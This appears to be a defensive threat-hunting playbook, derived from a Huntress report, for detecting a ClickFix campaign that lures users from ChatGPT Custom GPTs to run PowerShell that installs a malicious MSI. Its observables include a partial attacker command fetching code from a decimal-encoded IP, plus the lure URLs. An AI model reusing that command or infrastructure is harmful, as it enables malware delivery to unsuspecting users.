← All hunts high TLP:CLEAR Part 1 of 2

ChatGPT Custom GPT ClickFix Lure and MSI Installer

An attacker is redirecting users from ChatGPT Custom GPTs to a ClickFix site, triggering PowerShell commands that download and install a malicious MSI from a decimal-encoded IP address.

Based on research by Huntress 2026-09-30 12 steps · 4 queries T1053.005 T1059.001 T1190 T1547.001 T1574.002

Brief

The Shift to High-Trust Lures

Attackers are moving away from easily blocked domains to high-trust environments. A recent report by Huntress, Attackers Abuse ChatGPT Custom GPTs to Deliver RAT via ClickFix, describes a campaign that uses Custom GPTs to host social engineering lures. These lures redirect victims to a Google Sites page that prompts them to fix a "Service Availability" issue by running a PowerShell command. This command fetches a malicious payload from a decimal-encoded IP address.

Phase 1: Scoping and Behavioral Leads

The hunt begins by identifying the Windows estate and narrowing the search to hosts with PowerShell activity. The first primary query searches process activity for PowerShell or Pwsh instances using the Invoke-RestMethod (irm) command targeting decimal-encoded IP addresses (e.g., 1614733393). This pattern is a high-fidelity indicator of the ClickFix delivery mechanism, as legitimate administrative traffic rarely uses decimal-encoded hosts in the command line.

Phase 2: Assessment and Gating

Before running broader, resource-intensive queries, an analyst or automated agent evaluates the discovered command lines. This step confirms the lead by checking if the strings represent external infrastructure. If the command line matches the ClickFix pattern, the hunt proceeds to the corroboration phase. If no suspicious PowerShell activity exists, the hunt closes to save processing time.

Phase 3: Corroborating the Chain

Once a suspicious lead is confirmed, the hunt performs a fan-out search across DNS and File surfaces. It searches for DNS lookups to chatgpt.com or sites.google.com originating from the suspect host to confirm the initial lure redirection. Simultaneously, it stacks MSI file creations in temporary directories across the environment. It flags any MSI files that appear on three or fewer hosts, such as ISOSimple.msi, which indicate the dropper has landed.

Phase 4: Triage and Containment

The final phase evaluates the combined evidence. A host showing the sequence of a ChatGPT visit, a PowerShell decimal IP command, and a rare MSI creation receives a high-confidence malicious verdict. The hunt provides instructions to isolate the host immediately to prevent the subsequent DLL sideloading and Remote Access Trojan (RAT) execution.

What This Hunt Cannot See

This hunt faces two primary blind spots. First, DNS visibility only confirms that a user visited ChatGPT; it cannot distinguish between a legitimate session and the specific Custom GPT path without full HTTP proxy logs. Second, the second-layer PowerShell script (e.g., 1777.ps1) often uses shift-key obfuscation. While the hunt identifies the download, manual analysis of the script blocks is required to decode the specific final-stage behavior if the EDR does not automatically de-obfuscate it.

Steps

  1. Scope Windows endpoints

    Query · scoping

    Find the hosts where PowerShell is installed and managed, narrowing the estate for the behavioural lead.

    reads hb_software_inventorysql
    SELECT device_hostname, package_name, package_version FROM hb_software_inventory WHERE LOWER(package_name) LIKE '%powershell%'

    What a hit looks like. A list of hosts with PowerShell installed. Silence indicates no software inventory for PowerShell is available.

  2. PowerShell IRM to decimal IP

    Query · detection candidate

    Identify ClickFix execution where PowerShell uses Invoke-RestMethod (irm) to reach a decimal-encoded IP host.

    reads hb_process_activitysql
    SELECT device_hostname, process_cmd_line, user_name, time FROM hb_process_activity WHERE (LOWER(process_name) LIKE '%powershell.exe' OR LOWER(process_name) LIKE '%pwsh.exe') AND (process_cmd_line LIKE '%irm %') AND (process_cmd_line LIKE '%' || '{{decimal_ip}}' || '%' OR process_cmd_line GLOB '*[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]*') AND ('{{scope_hosts}}' = '' OR instr(',' || '{{scope_hosts}}' || ',', ',' || device_hostname || ',') > 0) AND time >= datetime('now', '-{{lookback_days}} days')

    What a hit looks like. PowerShell processes fetching scripts from numeric or decimal host strings. Silence proves no such commands ran in the window.

  3. Assess PowerShell lead

    Agent triage

    Evaluate whether the PowerShell command line matches the ClickFix pattern before running expensive queries.

  4. Gate on PowerShell lead

    Decision

    Stop the hunt if no suspicious PowerShell commands exist, saving resources.

  5. DNS lure redirection

    Query · enrichment

    Identify DNS lookups to ChatGPT and Google Sites redirect domains on the suspected hosts.

    reads hb_dns_activitysql
    SELECT device_hostname, query_hostname, time FROM hb_dns_activity WHERE instr(',' || '{{lure_domains}}' || ',', ',' || LOWER(query_hostname) || ',') > 0 AND ('{{scope_hosts}}' = '' OR instr(',' || '{{scope_hosts}}' || ',', ',' || device_hostname || ',') > 0) AND time >= datetime('now', '-{{lookback_days}} days')

    What a hit looks like. DNS requests for the lure domains originating from suspected hosts. Silence says nothing if the domains have rotated.

  6. Rare MSI creation in Temp

    Query · baseline

    Identify the creation of the malicious MSI or other rare installers in temporary directories.

    reads hb_file_activitysql
    SELECT file_name, device_hostname, file_path, time, COUNT(DISTINCT device_hostname) AS host_count FROM hb_file_activity WHERE LOWER(file_path) LIKE '%\temp\%' AND LOWER(file_name) LIKE '%.msi' AND time >= datetime('now', '-{{lookback_days}} days') GROUP BY file_name HAVING host_count <= 3

    What a hit looks like. A stack-count of MSI files; ISOSimple.msi or other rare installers indicate the payload dropped during the ClickFix attack.

  7. Triage infection chain

    Agent triage

    Evaluate the combined evidence from PowerShell, DNS, and file activity to confirm the infection.

  8. Route infection verdict

    Decision

    Isolate confirmed infected hosts or route to manual review.

  9. Isolate host

    Response action

    Contain the infection to prevent the subsequent DLL sideloading and RAT execution.

  10. Analyst review

    Analyst task

    Manually confirm the infection if the automated triage was inconclusive.

  11. Close out

    Analyst task

    Record results and refine search parameters for future runs.

Coverage

Scenario coverage

StageCoveredHow, or why not
Custom GPT Redirect
T1190
Yes dns-lure-redirection
ClickFix PowerShell Execution
T1059.001
Yes powershell-decimal-ip-lead
Malicious MSI Installation
T1059.001
Yes msi-file-creation
Dual-Mechanism Persistence
T1547.001 · T1053.005
Out of scope Belongs to another part of the 'Attackers Abuse ChatGPT Custom GPTs to Deliver RAT via ClickFix' series.
Canon App DLL Sideloading
T1574.002
Out of scope Belongs to another part of the 'Attackers Abuse ChatGPT Custom GPTs to Deliver RAT via ClickFix' series.
Steganographic Loader Unpacking
T1059.001
Out of scope Belongs to another part of the 'Attackers Abuse ChatGPT Custom GPTs to Deliver RAT via ClickFix' series.

Blind spots

  • Needs hb_http_activity with full url_path. DNS only shows the domain; without proxy logs, we cannot distinguish a legitimate ChatGPT visit from the malicious redirect path. It would answer whether the user visited the specific Custom GPT path.
  • Needs hb_script_activity. The script uses nested loops and integer shifting; the analyst must manually decode it if the script block is not captured. It would answer what the second-layer PowerShell script performs.

Parameters & data

Parameters

ParameterTypeDefaultWhat it is
decimal_ipstring1614733393Decimal-encoded IP address observed in ClickFix PowerShell commands.
lookback_daysnumber14Days of history to examine.
lure_domainslist[domain]chatgpt.com, sites.google.comDomains hosting the Custom GPT lure and the ClickFix redirect page.
scope_hostslist[host]—Optional list of hostnames to narrow the search.

Telemetry

SourceCategoryTelemetry
Endpoint telemetry (hb_ surfaces)endpointendpoint

Source

Download hunt.md Definition (JSON) An open hunt.md file; it runs anywhere that reads the format.
---
analysis: The hunt evaluates cheap decimal-IP leads before running expensive temporal
  DNS and file-prevalence queries, providing a level of context that a single static
  rule would miss.
blind_spots:
- id: visibility-gap
  question: whether the user visited the specific Custom GPT path
  requires: hb_http_activity with full url_path
  risk: DNS only shows the domain; without proxy logs, we cannot distinguish a legitimate
    ChatGPT visit from the malicious redirect path.
  stage: initial-access-custom-gpt-lure
- id: script-obfuscation
  question: what the second-layer PowerShell script performs
  requires: hb_script_activity
  risk: The script uses nested loops and integer shifting; the analyst must manually
    decode it if the script block is not captured.
  stage: execution-clickfix-terminal-paste
coverage:
- stage: initial-access-custom-gpt-lure
  status: covered
  steps:
  - dns-lure-redirection
- stage: execution-clickfix-terminal-paste
  status: covered
  steps:
  - powershell-decimal-ip-lead
- stage: execution-msi-deployment
  status: covered
  steps:
  - msi-file-creation
- reason: Belongs to another part of the 'Attackers Abuse ChatGPT Custom GPTs to Deliver
    RAT via ClickFix' series.
  stage: persistence-canon-reader
  status: out_of_scope
- reason: Belongs to another part of the 'Attackers Abuse ChatGPT Custom GPTs to Deliver
    RAT via ClickFix' series.
  stage: defense-evasion-dll-sideloading
  status: out_of_scope
- reason: Belongs to another part of the 'Attackers Abuse ChatGPT Custom GPTs to Deliver
    RAT via ClickFix' series.
  stage: collection-stego-payload-extraction
  status: out_of_scope
guardrails:
  claims: no_unsupported
  evidence: citation_required
  missing_data: not_benign
  telemetry: untrusted
hunt:
  applicability: campaign-specific
  handoff: promote-to-detection
  justification: Attackers are abusing high-trust domains like ChatGPT to bypass web
    filters. A negative result confirms that social engineering via Custom GPTs has
    not successfully breached the estate.
  methodology: model-assisted
  trigger: intel-report
hypothesis: An attacker is redirecting users from ChatGPT Custom GPTs to a ClickFix
  site, triggering PowerShell commands that download and install a malicious MSI from
  a decimal-encoded IP address.
labels:
- hunt
- attack.t1190
- attack.t1059.001
- attack.t1574.002
- attack.t1547.001
- attack.t1053.005
- defense evasion
- execution
- initial access
- persistence
name: ChatGPT Custom GPT ClickFix Lure and MSI Installer
parameters:
  decimal_ip:
    default: '1614733393'
    description: Decimal-encoded IP address observed in ClickFix PowerShell commands.
    from:
      kind: article
      observed: '2026-09-28'
      ref: huntress
    type: string
  lookback_days:
    default: '14'
    description: Days of history to examine.
    from:
      kind: manual
      observed: '2026-09-28'
      ref: default-retention
    type: number
  lure_domains:
    default:
    - chatgpt.com
    - sites.google.com
    description: Domains hosting the Custom GPT lure and the ClickFix redirect page.
    from:
      kind: article
      observed: '2026-09-28'
      ref: huntress
    type: list[domain]
  scope_hosts:
    default: []
    description: Optional list of hostnames to narrow the search.
    from:
      kind: manual
      observed: '2026-09-28'
      ref: analyst-defined
    type: list[host]
provenance:
  authors:
  - name: Huntbase hunt generation
    org: huntbase.io
  generated:
    by: huntbase-hunt-generation
    from: https://www.huntress.com/blog/chatgpt-custom-gpts-clickfix-rat
    gates:
    - dry-run
    - lint
    model: hb_google/gemini-3-flash-preview
rationale: Start with all enrolled Windows endpoints. The primary lead is the PowerShell
  decimal host pattern (e.g., 1614733393).
references:
- name: "Huntress \u2014 Attackers Abuse ChatGPT Custom GPTs to Deliver RAT via ClickFix"
  url: https://www.huntress.com/blog/chatgpt-custom-gpts-clickfix-rat
related:
- hunt: canon-reader-dll-sideloading
  reason: This hunt focuses on initial access; the subsequent sideloading and RAT
    execution require different hypotheses.
  relation: out-of-scope-alternative
scenario:
  stages:
  - name: Custom GPT Redirect
    observables:
    - chatgpt.com/g/g-6ab595ad6554819181b686d4876efb80-plus-5-6
    - chatgpt.com/g/g-6ab6ba039440819185ed491740b11cf8-plus-5-6
    - sites.google.com/view/antibot172881
    slug: initial-access-custom-gpt-lure
    tactic: initial-access
    techniques:
    - T1190
  - name: ClickFix PowerShell Execution
    observables:
    - PowerShell.exe -ExecutionPolicy Bypass "irm 1614733393/12
    - 1614733393/12
    - 1777.ps1
    - 6469.ps1
    - 96.62.224.81
    slug: execution-clickfix-terminal-paste
    tactic: execution
    techniques:
    - T1059.001
  - name: Malicious MSI Installation
    observables:
    - ISOSimple.msi
    - msiexec /qn /norestart
    - '%TEMP%\*_ISOSimple.msi'
    slug: execution-msi-deployment
    tactic: execution
    techniques:
    - T1059.001
  - name: Dual-Mechanism Persistence
    observables:
    - Canon Configuration Reader
    - Software\Microsoft\Windows\CurrentVersion\Run
    - C:\Windows\System32\Tasks
    slug: persistence-canon-reader
    tactic: persistence
    techniques:
    - T1547.001
    - T1053.005
  - name: Canon App DLL Sideloading
    observables:
    - COTFileReadApp.exe
    - ceiinfolog.dll
    - rdCore.dll
    - WPFLocalizeExtension.dll
    - WMPCL.dll
    - '%LOCALAPPDATA%\Programs\Advanced Printer Configuration Reader\'
    slug: defense-evasion-dll-sideloading
    tactic: defense-evasion
    techniques:
    - T1574.002
  - name: Steganographic Loader Unpacking
    observables:
    - Common.Integrator.Preview.wav
    - monitor.raw
    slug: collection-stego-payload-extraction
    tactic: execution
    techniques:
    - T1059.001
  summary: Attackers leverage malicious ChatGPT Custom GPTs to direct victims to a
    ClickFix lure on Google Sites, inducing them to execute a PowerShell command that
    downloads a multi-stage loader. The campaign culminates in the installation of
    a remote access trojan (RAT) through a Canon-signed application manipulated via
    DLL sideloading and persistent scheduled tasks.
series:
  index: 1
  slug: attackers-abuse-chatgpt-custom-gpts-to-deliver-rat-via-clickfix
  title: Attackers Abuse ChatGPT Custom GPTs to Deliver RAT via ClickFix
  total: 2
severity: high
targets:
  analyst:
    name: Tier-2 analyst
    role: analyst
  endpoint:
    category: endpoint
    name: Endpoint telemetry (hb_ surfaces)
    telemetry:
    - endpoint
  hunter:
    agent: true
    name: Hunt agent
tlp: clear
type: investigation
---


# ChatGPT Custom GPT ClickFix Lure and MSI Installer

This hunt identifies a multi-stage infection chain beginning with a social engineering lure on the legitimate ChatGPT domain. Attackers use a Service Availability Notice to redirect victims to a Google Sites page. This page delivers a ClickFix command that executes PowerShell to fetch a script from a decimal-encoded IP address, which then installs a malicious MSI. The hunt opens with a scoping step for Windows systems, identifies PowerShell leads reaching decimal host strings, and then gates on an agent's assessment before performing a fan-out of network and file queries to confirm the infection.

## scope-potential-targets
<!-- Scope Windows endpoints -->
Find the hosts where PowerShell is installed and managed, narrowing the estate for the behavioural lead.

```sqlite target=endpoint role=scoping
~~~yaml
expected: A list of hosts with PowerShell installed. Silence indicates no software
  inventory for PowerShell is available.
reads:
- device_hostname
- package_name
- package_version
silence: not_evidence_of_absence
source: hb_software_inventory
verified: dry-run
verified_at: '2026-09-30'
~~~
SELECT device_hostname, package_name, package_version FROM hb_software_inventory WHERE LOWER(package_name) LIKE '%powershell%'
```

## powershell-decimal-ip-lead
<!-- PowerShell IRM to decimal IP -->
Identify ClickFix execution where PowerShell uses Invoke-RestMethod (irm) to reach a decimal-encoded IP host.

```sqlite target=endpoint role=detection-candidate params=(decimal_ip=decimal_ip, lookback_days=lookback_days, scope_hosts=scope_hosts)
~~~yaml
expected: PowerShell processes fetching scripts from numeric or decimal host strings.
  Silence proves no such commands ran in the window.
reads:
- device_hostname
- process_cmd_line
- user_name
- time
silence: evidence_of_absence
source: hb_process_activity
verified: dry-run
verified_at: '2026-09-30'
~~~
SELECT device_hostname, process_cmd_line, user_name, time FROM hb_process_activity WHERE (LOWER(process_name) LIKE '%powershell.exe' OR LOWER(process_name) LIKE '%pwsh.exe') AND (process_cmd_line LIKE '%irm %') AND (process_cmd_line LIKE '%' || '{{decimal_ip}}' || '%' OR process_cmd_line GLOB '*[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]*') AND ('{{scope_hosts}}' = '' OR instr(',' || '{{scope_hosts}}' || ',', ',' || device_hostname || ',') > 0) AND time >= datetime('now', '-{{lookback_days}} days')
```

## assess-lead
<!-- Assess PowerShell lead -->
```agent target=hunter
cite: required
context:
- powershell-decimal-ip-lead
max_iterations: 3
objective: Identify strings in the process command lines that represent decimal-encoded
  IP addresses and confirm they reach external infrastructure.
success_criteria: A verdict for each host citing specific command line entries and
  the resolved IP.
tools:
- endpoint
```

## gate-on-lead
<!-- Gate on PowerShell lead -->
if~: "the assess-lead verdict is suspicious or malicious for at least one host" (confidence: high, judge=hunter)
then: → corroborate-activity
indeterminate: → analyst-review
unavailable: → analyst-review (blind_spot: visibility-gap)
else: → close-out

## corroborate-activity
<!-- Corroborate ClickFix activity -->
parallel:
- → dns-lure-redirection
- → msi-file-creation
join: → triage-infection

## dns-lure-redirection
<!-- DNS lure redirection -->
Identify DNS lookups to ChatGPT and Google Sites redirect domains on the suspected hosts.

```sqlite target=endpoint role=enrichment params=(lure_domains=lure_domains, scope_hosts=scope_hosts, lookback_days=lookback_days)
~~~yaml
expected: DNS requests for the lure domains originating from suspected hosts. Silence
  says nothing if the domains have rotated.
reads:
- device_hostname
- query_hostname
- time
silence: not_evidence_of_absence
source: hb_dns_activity
verified: dry-run
verified_at: '2026-09-30'
~~~
SELECT device_hostname, query_hostname, time FROM hb_dns_activity WHERE instr(',' || '{{lure_domains}}' || ',', ',' || LOWER(query_hostname) || ',') > 0 AND ('{{scope_hosts}}' = '' OR instr(',' || '{{scope_hosts}}' || ',', ',' || device_hostname || ',') > 0) AND time >= datetime('now', '-{{lookback_days}} days')
```

## msi-file-creation
<!-- Rare MSI creation in Temp -->
Identify the creation of the malicious MSI or other rare installers in temporary directories.

```sqlite target=endpoint role=baseline params=(lookback_days=lookback_days)
~~~yaml
baseline:
  compare: first_seen
  window: '{{lookback_days}}d'
expected: A stack-count of MSI files; ISOSimple.msi or other rare installers indicate
  the payload dropped during the ClickFix attack.
prevalence:
  by: device_hostname
  key:
  - file_name
  rare_below: 3
reads:
- file_name
- device_hostname
- file_path
- time
silence: not_evidence_of_absence
source: hb_file_activity
verified: dry-run
verified_at: '2026-09-30'
~~~
SELECT file_name, device_hostname, file_path, time, COUNT(DISTINCT device_hostname) AS host_count FROM hb_file_activity WHERE LOWER(file_path) LIKE '%\temp\%' AND LOWER(file_name) LIKE '%.msi' AND time >= datetime('now', '-{{lookback_days}} days') GROUP BY file_name HAVING host_count <= 3
```

## triage-infection
<!-- Triage infection chain -->
```agent target=hunter
cite: required
context:
- assess-lead
- dns-lure-redirection
- msi-file-creation
max_iterations: 5
objective: Determine if any host shows the sequence of social engineering redirection,
  PowerShell execution via decimal host, and subsequent drop of a rare MSI.
success_criteria: A final verdict for each host citing evidence from all context steps.
tools:
- endpoint
```

## route-on-triage
<!-- Route infection verdict -->
if~: "the triage-infection verdict is malicious for at least one host" (confidence: high, judge=hunter)
then: → contain-host
indeterminate: → analyst-review
unavailable: → analyst-review (blind_spot: visibility-gap)
else: → analyst-review

## contain-host
<!-- Isolate host -->
```action target=endpoint
~~~yaml
approval: required
~~~
Isolate the host immediately. Preserve the temporary directory for forensic recovery of the MSI and the 1777.ps1 script.
```
→ analyst-review

## analyst-review
<!-- Analyst review -->
```manual target=analyst
Examine the PowerShell command lines from the lead. Check hb_script_activity for script blocks matching the article's shift-key obfuscation pattern. Verify if any MSI installation occurred under a random GUID name.
```
→ close-out

## close-out
<!-- Close out -->
```manual target=analyst
Document findings. If decimal IPs are noisy, refine the GLOB pattern to require a more specific digit length. Update the lure domain list.
```
→ end

Run it

Take this hunt into your environment.

Open it in Huntbase to run every step against your own connections, with Scout weighing the evidence and your analysts in command. Or take the open hunt.md file anywhere that reads the format.

Machine-drafted by huntbase-hunt-generation using hb_google/gemini-3-flash-preview, gated by dry-run, lint, then reviewed by a person.